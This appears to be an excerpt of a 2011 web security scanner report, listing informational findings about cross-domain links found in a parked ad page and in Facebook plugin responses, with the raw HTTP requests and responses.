<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=2011 Weekly Astrology&amp;afdt=yPqN19NzfXkKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASACMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">2011 Weekly Astrology</a>
...[SNIP]...
<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=Monthly Zodiac Horoscopes&amp;afdt=N7YFayjO6aIKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASADMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Monthly Zodiac Horoscopes</a>
...[SNIP]...
<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=Gemini Horoscope&amp;afdt=gwmVypG6lssKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASAEMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Gemini Horoscope</a>
...[SNIP]...
<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=Daily Tarot Reading&amp;afdt=zoqPve3o2AIKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASAFMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Daily Tarot Reading</a>
...[SNIP]...
<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=Libra Horoscope&amp;afdt=G_OvQ2NSXZYKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASAGMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Libra Horoscope</a>
...[SNIP]...
<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=Taurus Horoscope&amp;afdt=z0wf8MACNWIKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASAHMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Taurus Horoscope</a>
...[SNIP]...
<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=Aries Horoscope&amp;afdt=dez9RxQMI9cKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASAIMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Aries Horoscope</a>
...[SNIP]...
<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=Leo Horoscopes&amp;afdt=rrZdbbyVJtoKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASAJMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Leo Horoscopes</a>
...[SNIP]...
<li class="strong"><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Travel&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Travel</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Airline&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Airline</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Car%20Rental&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Car Rental</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Hotels&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Hotels</a>
...[SNIP]...
<li class="strong"><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Financial%20Planning&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Financial Planning</a>
...[SNIP]...
<li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Loans&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Loans</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Credit%20Cards&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Credit Cards</a>
...[SNIP]...
<li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Debt%20Consolidation&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Debt Consolidation</a>
...[SNIP]...
<li class="strong"><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=E%20Commerce&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">E Commerce</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=VoIP&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">VoIP</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Broadband&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Broadband</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Domain%20Names&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Domain Names</a>
...[SNIP]...
<li class="strong"><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Lifestyle&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Lifestyle</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Fitness&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Fitness</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Dating&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Dating</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Singles&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Singles</a>
...[SNIP]...
<li class="strong"><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Real%20Estate&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Real Estate</a>
...[SNIP]...
<li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Mortgages&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Mortgages</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Refinancing&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Refinancing</a>
...[SNIP]...
<li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Home%20Equity%20Loans&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Home Equity Loans</a>
...[SNIP]...
<li class="strong"><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Insurance&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Insurance</a></li><li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Car%20Insurance&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Car Insurance</a>
...[SNIP]...
<li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Travel%20Insurance&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Travel Insurance</a>
...[SNIP]...
<li><a xmlns:xf="http://www.w3.org/2002/08/xquery-functions" target="_top" class="popularCategory" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=p&amp;q=Health%20Insurance&amp;afdt=eNI0-zg7lygKEwjSnsTIw-KoAhUMaZ0KHdcgS74YAiAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Health Insurance</a>
...[SNIP]...
<div class="imageAd"><a target="_blank" href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=B94pyduHLTcydOrHJsQfrv5jICMLNh5cCmpKS2SbAjbcB8Kt-EAEYASD4--IfOABQsq2RmPj_____AWDJhoWJiKSEEKABrvvc2AOyARFkYWlseWZlYXR1cmVzLmNvbboBBGh0bWzIAQLaARlodHRwOi8vZGFpbHlmZWF0dXJlcy5jb20vqAMByAMZ6AOYA-gDwAPoA-0C9QNEAADE9QMgAAAA&amp;num=1&amp;adurl=http://www.mycricket.com/muve-music/%3Futm_source%3Dads%26utm_medium%3Dq22011%26utm_campaign%3Dq2facebook&amp;sig=AGiWqtwqBoJJQPo9_jtUvWusnQ4Qj5ZhcA&amp;client=ca-afdo-pub-3882615531336002"><img border="0" align="bottom" width="728" height="90" src="http://pagead2.googlesyndication.com/pagead/imgad?id=CNuKhvbozLbKbRDYBRhaMggOc5EBJf6qRg"></img>
...[SNIP]...
<div id="footer">.. 2010 All rights reserved.
<a class="privacy" href="http://www.gstatic.com/domainads/privacy/" target="_blank">Privacy</a>
...[SNIP]...
13.66. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /connect/connect.php?id=49133838740&connections=10&stream=1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.71.123
X-Cnection: close
Date: Thu, 12 May 2011 13:32:01 GMT
Content-Length: 12141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/mIRZkgozNNM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/GreenfieldDR" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50355_49133838740_2692078_q.jpg" alt="Greenfield Daily Reporter" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/turner.bitton" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174415_100001678300551_3520179_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=840738179" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187088_840738179_65507_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=25310465" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174481_25310465_5135741_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=41701361" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186017_41701361_4561648_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001291801019" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187546_100001291801019_6394029_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/browninglr" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48915_1120838083_7787587_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001938908776" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/jeremysmccarty" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48903_1467916658_7487_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/april.parmer" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211265_1165904516_1897825_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002000130273" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203103_100002000130273_1137279_q.jpg" /><div class="name">
...[SNIP]...
13.67. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/activity.php?site=zdnet.com&width=300&height=350&header=false&colorscheme=light&recommendations=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.77.109
X-Cnection: close
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Length: 13301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/mIRZkgozNNM.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4804326f1e84053e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/microsoft/microsoft-buys-skype-for-85-billion-creates-new-business-division/9406" title="Microsoft buys Skype for $8.5 billion; creates new business division | ZDNet" target="_top"><img class="img" src="http://i.zdnet.com/gallery/413193-130-92.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.zdnet.com/blog/microsoft/microsoft-buys-skype-for-85-billion-creates-new-business-division/9406" target="_top">Microsoft buys Skype for $8.5 billion; creates new business division | ZDNet</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_6580c62a405c15a6"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/security/osama-execution-video-scam-spreading-on-facebook/8607" title="Osama execution video scam spreading on Facebook | ZDNet" target="_top"><img class="img" src="http://i.zdnet.com/gallery/413216-130-92.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.zdnet.com/blog/security/osama-execution-video-scam-spreading-on-facebook/8607" target="_top">Osama execution video scam spreading on Facebook | ZDNet</a>
...[SNIP]...
